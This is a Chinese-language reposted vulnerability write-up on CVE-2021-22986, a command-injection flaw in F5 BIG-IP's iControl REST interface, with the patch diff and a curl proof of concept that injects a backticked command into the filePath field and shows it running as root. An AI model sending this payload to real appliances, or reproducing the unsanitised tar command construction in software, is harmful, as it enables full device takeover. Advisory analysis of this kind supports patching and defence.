记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

CVE-2021-22986 F5 BIG-IP/BIG-IQ RCE

2021-03-17 16:32



        此漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。此漏洞只能通过控制平面利用,而不能通过数据平面利用。剥削可能导致完全的系统危害。设备模式下的BIG-IP系统也容易受到攻击。



CVE-2021-22986


        从补丁分析和测试来看,此漏洞似乎涉及某种身份验证绕过甚至SSRF。下面的完整上下文修补程序已对其行号进行了调整,以供在调试器中使用。


RCE


        这是命令中的认证后根命令注入tar(1)

修补


        过滤将应用于用户控制的taskState.filePath参数

[snip]+  private static final Pattern validFilePathChars = Pattern.compile("(^[a-zA-Z][a-zA-Z0-9_.\\-\\s()]*)\\.([tT][aA][rR]\\.[gG][zZ])$");[snip]   private void validateGzipBundle(final IAppBundleInstallTaskState taskState) {     if (Utilities.isNullOrEmpty(taskState.filePath)) {       File agcUseCasePackDir = new File("/var/apm/f5-iappslx-agc-usecase-pack/");       if (!agcUseCasePackDir.exists() || !agcUseCasePackDir.isDirectory()) {         String error = "Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.";         failTask(taskState, error, "");         return;       }       File[] agcUseCasePack = agcUseCasePackDir.listFiles();       if (agcUseCasePack == null || agcUseCasePack.length == 0 || !agcUseCasePack[0].isFile()) {
String error = "Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack."; failTask(taskState, error, ""); return; } taskState.filePath = agcUseCasePack[0].getPath(); }
+ String filename = taskState.filePath.substring(taskState.filePath.lastIndexOf('/') + 1);+ Matcher m = validFilePathChars.matcher(filename);+ if (!m.matches()) {+ String errorMessage = String.format("Access Guided Configuration use case pack validation failed: the file name %s must begin with alphabet, and only contain letters, numbers, spaces and/or special characters (underscore (_), period (.), hyphen (-) and round brackets ()). Only a .tar.gz file is allowed", new Object[] { filename });++++ failTask(taskState, errorMessage, "");++ return;+ } final String extractTarCommand = "tar -xf " + taskState.filePath + " -O > /dev/null";

ShellExecutor extractTar = new ShellExecutor(extractTarCommand);
CompletionHandler<ShellExecutionResult> executionFinishedHandler = new CompletionHandler<ShellExecutionResult>() { public void completed(ShellExecutionResult extractQueryResult) { if (extractQueryResult.getExitStatus().intValue() != 0) { String error = extractTarCommand + " failed with exit code=" + extractQueryResult.getExitStatus();

IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, "Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.", error + "stdout + stderr=" + extractQueryResult.getOutput());

return; }

taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.QUERY_INSTALLED_RPM; IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState); }

public void failed(Exception ex, ShellExecutionResult rpmQueryResult) { IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, "Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.", String.format("%s failed", new Object[] { this.val$extractTarCommand }) + RestHelper.throwableStackToString(ex)); } };


extractTar.startExecution(executionFinishedHandler); }[snip]


PoC


        受影响的端点为/mgmt/tm/access/bundle-install-tasks

wvu@kharak:~$ curl -ksu admin:[redacted] https://192.168.123.134/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"`id`"}' | jq .{  "filePath": "`id`",  "toBeInstalledAppRpmsIndex": -1,  "id": "36671f83-d1be-4f5a-a2e6-7f9442a2a76f",  "status": "CREATED",  "userReference": {    "link": "https://localhost/mgmt/shared/authz/users/admin"  },  "identityReferences": [    {      "link": "https://localhost/mgmt/shared/authz/users/admin"    }  ],  "ownerMachineId": "ac2562f0-e41f-4652-ba35-6a2b804b235e",  "generation": 1,  "lastUpdateMicros": 1615930477819656,  "kind": "tm:access:bundle-install-tasks:iappbundleinstalltaskstate",  "selfLink": "https://localhost/mgmt/tm/access/bundle-install-tasks/36671f83-d1be-4f5a-a2e6-7f9442a2a76f"}wvu@kharak:~$


        该id(1)命令以root用户身份执行

[pid 64748] execve("/bin/tar", ["tar", "-xf", "uid=0(root)", "gid=0(root)", "groups=0(root)", "context=system_u:system_r:initrc_t:s0", "-O"], [/* 9 vars */]) = 0


        可能会出现错误/var/log/restjavad.0.log

[SEVERE][10029][16 Mar 2021 21:34:37 UTC][8100/tm/access/bundle-install-tasks IAppBundleInstallTaskCollectionWorker] Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive. error details: tar -xf `id` -O > /dev/null failedorg.apache.commons.exec.ExecuteException: Process exited with an error: 2 (Exit value: 2)  at org.apache.commons.exec.DefaultExecutor.executeInternal(DefaultExecutor.java:404)  at org.apache.commons.exec.DefaultExecutor.access$200(DefaultExecutor.java:48)  at org.apache.commons.exec.DefaultExecutor$1.run(DefaultExecutor.java:200)  at java.lang.Thread.run(Thread.java:748)



RCE更新


        Rich Warren使用SSRF制作了完整的RCE链


参考文献:

https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986



知识来源: https://mp.weixin.qq.com/s?__biz=MzAwMjQ2NTQ4Mg==&mid=2247485905&idx=1&sn=a8b4e79fa4d6acae6477c4eaef655870

阅读:27040 | 评论:0 | 标签:CVE

想收藏或者和大家分享这篇好文章→复制链接地址

“CVE-2021-22986 F5 BIG-IP/BIG-IQ RCE”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤永久免费的Hackdig,帮你成为掌握黑客技术的英雄

🧚 🤲 🧜

标签云